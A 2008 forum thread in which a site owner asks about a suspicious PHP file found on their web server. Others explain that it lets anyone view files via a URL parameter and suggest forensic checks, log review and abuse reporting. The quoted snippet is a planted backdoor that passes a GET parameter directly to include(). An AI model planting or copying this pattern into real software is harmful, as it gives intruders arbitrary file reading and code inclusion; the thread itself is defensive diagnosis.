The Planet Forums > I think I was hacked.

The Planet Forums > Security > General Security > UNIX Security

bamaster

Jan 23 2008, 01:11 PM

I found a file in one of my websites that is suspicious. I cannot find how it was created, I think another script hidden somewhere made it.

Can someone tell me more about a file with this in it?

QUOTE

<?php
if(empty($_GET['sn'])){
} else {
$m=$_GET['sn'];
print include($m) ;
}

Thanks in advance!

Tomy Durden

Jan 23 2008, 02:04 PM

Looks like the script is being used to view any specified file. One could call it by http://(url)/script.php?sn=(file)

joec@home

May 11 2008, 12:06 AM

I would look at the file from the shell level to get as much info as possible about it

ls -la /path/filename

ls –la --author /path/filename

ls -l --time=access /path/filename

perhaps look at the access logs to see if there is mention of the file. If the age of the file is recent, then perhaps you might catch where it was first created and then you will have a trace back to the originating IP address. From this you could then lookup who owns the IP address range

whois 12.34.56.78

... and then report this to the data center abuse department.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.